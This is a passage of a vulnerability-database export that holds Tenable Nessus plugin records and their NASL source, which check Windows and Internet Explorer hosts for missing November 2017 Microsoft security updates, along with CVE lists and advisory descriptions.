vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
(CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048953: Windows 10 Version 1607 and Windows Server 2016 November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048953.NASL", "href": "https://www.tenable.com/plugins/nessus/104549", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104549);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11861\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11872\",\n \"CVE-2017-11873\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101706,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101723,\n 101725,\n 101727,\n 101728,\n 101729,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101749,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048953\");\n script_xref(name:\"MSFT\", value:\"MS17-4048953\");\n\n script_name(english:\"KB4048953: Windows 10 Version 1607 and Windows Server 2016 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048953.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft 
Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. 
The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11873)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. 
An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048953/windows-10-update-kb4048953\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?119c56db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048953.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048953');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048953])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:36", "description": "The remote Windows host is missing security update 4048961\nor cumulative 
update 4048958. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. 
An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 November 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_NOV_4048958.NASL", "href": "https://www.tenable.com/plugins/nessus/104554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104554);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11831\",\n \"CVE-2017-11834\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101709,\n 101711,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101725,\n 101729,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048961\");\n script_xref(name:\"MSKB\", value:\"4048958\");\n script_xref(name:\"MSFT\", value:\"MS17-4048958\");\n script_xref(name:\"MSFT\", value:\"MS17-4048961\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 November 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048961\nor cumulative update 4048958. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
(CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
(CVE-2017-11850)\");\n # https://support.microsoft.com/en-us/help/4048961/windows-81-update-kb4048961\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dd6d4c6a\");\n # https://support.microsoft.com/en-us/help/4048958/windows-81-update-kb4048958\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b7fa1d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4048961 or Cumulative update KB4048958.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048961', '4048958');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048961, 4048958])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:37", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)", "edition": 32, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (November 2017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11846"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS17_NOV_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104894", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104894);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11834\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11848\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\"\n );\n script_bugtraq_id(\n 101703,\n 101709,\n 101715,\n 101716,\n 101722,\n 101725,\n 101737,\n 101740,\n 101741,\n 101742,\n 101751,\n 101753\n );\n script_xref(name:\"MSKB\", value:\"4048957\");\n script_xref(name:\"MSKB\", value:\"4048959\");\n script_xref(name:\"MSKB\", value:\"4048958\");\n script_xref(name:\"MSKB\", value:\"4047206\");\n script_xref(name:\"MSFT\", value:\"MS17-4048957\");\n script_xref(name:\"MSFT\", value:\"MS17-4048959\");\n script_xref(name:\"MSFT\", value:\"MS17-4048958\");\n script_xref(name:\"MSFT\", value:\"MS17-4047206\");\n\n script_name(english:\"Security Updates for Internet Explorer (November 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. 
